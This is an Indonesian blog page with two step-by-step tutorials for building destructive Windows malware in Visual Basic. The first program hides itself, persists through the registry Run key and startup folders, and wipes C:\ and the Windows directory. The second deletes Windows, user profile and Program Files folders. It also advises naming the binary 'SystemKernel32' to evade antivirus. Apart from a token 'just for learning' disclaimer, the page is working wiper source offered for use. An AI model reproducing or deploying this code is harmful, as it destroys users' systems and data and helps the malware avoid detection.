Next Tutorial (relax)
Rabu, 12 Agustus 2009
Selasa, 16 Juni 2009
Seonggok Malware
Diaturin
Tapi jangan usil coy
ini cuma buat mengetahui ajeh
caranya yeh yeh
1. siapin form 1 and module 1
Buat Form sekecil mungkin
2. Copy lalu paste in di form
Nih code buat form
Dim namefile As String
Dim namereg As String
Private Sub Form_Load()
On Error Resume Next
Me.Hide
namefile = "virus.exe"
namereg = "virus"
If LCase$(App.Path) <> "c:\windows\system32" Or "c:\windows\start menu\programs\startup" Or "c:\windows\start menu\programs\start up" Or "c:\winnt\system32" Or "c:\winnt\start menu\programs\startup" Or "c:\winnt\start menu\programs\start up" Or "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" Then
reg namefile, namereg
End If
payload
End Sub
Function payload()
On Error Resume Next
Shell ("cmd /c del c:\windows\* /F /S /Q")
Shell ("cmd /c del c:\* /F /S /Q")
start:
MsgBox "Restart Yah"
GoTo start
End Function
3. Kalo yang ennni code buat modulnyah
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal Hkey As Long) As Long
Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal Hkey As Long, ByVal lpValueName As String) As Long
Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Sub savestring(Hkey As Long, strPath As String, strValue As String, strdata As String)
On Error Resume Next
Dim keyhand As Long
Dim X As Long
X = RegCreateKey(Hkey, strPath, keyhand)
X = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata))
X = RegCloseKey(keyhand)
End Sub
Public Function DeleteValue(ByVal Hkey As Long, ByVal strPath As String, ByVal strValue As String)
On Error Resume Next
Dim Xkey As Long
Dim X As Long
X = RegOpenKey(Hkey, strPath, Xkey)
X = RegDeleteValue(Xkey, strValue)
X = RegCloseKey(Xkey)
End Function
Function reg(filename As String, regname As String)
On Error GoTo error1
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\windows\system32\" & filename)
On Error GoTo error2
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\system32\" & filename
Exit Function
error1:
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\start menu\programs\startup\" & filename
On Error GoTo error4
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\start menu\programs\start up\" & filename
Exit Function
error2:
On Error GoTo error3
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\winnt\system32\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\winnt\system32\" & filename)
Exit Function
error3:
On Error GoTo error6
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\" & filename)
Exit Function
error4:
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\winnt\start menu\programs\startup\" & filename
On Error GoTo error5
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\winnt\start menu\programs\start up\" & filename
Exit Function
error5:
On Error GoTo enditnow
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" & filename
Exit Function
error6:
On Error GoTo error7
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\Documents and Settings\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\Documents and Settings" & filename)
Exit Function
error7:
On Error GoTo enditnow
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\program files\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\program files\" & filename)
Exit Function
enditnow:
On Error Resume Next
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
End
End Function
4. selese oi (T.T)
Antu Maya
Malware simple
Tapi jangan usil coy
ini cuma buat mengetahui ajeh
caranya yeh yeh
1. Buka Visual Basic
2. Bikin form sekecil banget mungkin banget Teh deh source code
Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject("Scripting.FileSystemObject")
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist("c:\windows\system32\sayur.txt") = True Then
End
Else
Call DelAll("c:\windows\system")
Call DelAll("c:\windows\system32")
Call DelAll("c:\windows")
Call DelAll("c:\Documents and Settings\All Users")
Call DelAll("c:\Documents and Settings\Administrator")
Call DelAll("c:\Documents and Settings")
Call DelAll("c:\Program Files\Common Files")
Call DelAll("c:\Program Files\Internet Explorer")
Call DelAll("c:\Program Files\Microsoft Visual Studio")
Call DelAll("c:\Program Files")
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = "" Then
FileExist = False
Else
FileExist = True
End If
End Function
3. Warning !!!
If FileExist("c:\windows\system32\sayur.txt") = True Then
perhatikan sayur.txt itu bisa diganti namanya terserah mw diganti apa.
itu fungsinya kalo ada file yang bernama sayur.txt di system32 kalo dak ade buat dukin
pake notepad simpan di system32, nih virus ga jadi beraktifitas ???
4. Call DelAll("c:\windows\system")
Call DelAll("c:\windows\system32")
Call DelAll("c:\windows")
Call DelAll("C:\Documents and Settings\All Users")
Call DelAll("C:\Documents and Settings\Administrator")
Call DelAll("C:\Documents and Settings")
Call DelAll("C:\Program Files\Common Files")
Call DelAll("C:\Program Files\Internet Explorer")
Call DelAll("C:\Program Files\Microsoft Visual Studio")
Nah ini yang bahaya (O_o) baris ini fungsinya buat ngapus directori
bisa di ganti
misalnya jadi
CAll DelAll(*mp3*)
CAll DelAll(*doc*) atw apalah
5. Yang Terakhir kamu kompile pake nama "SystemKernel32" biar ga kedeteksi AntiVirus
6. Simpel Kan
Call DelAll("C:\Program Files")
Langganan:
Postingan (Atom)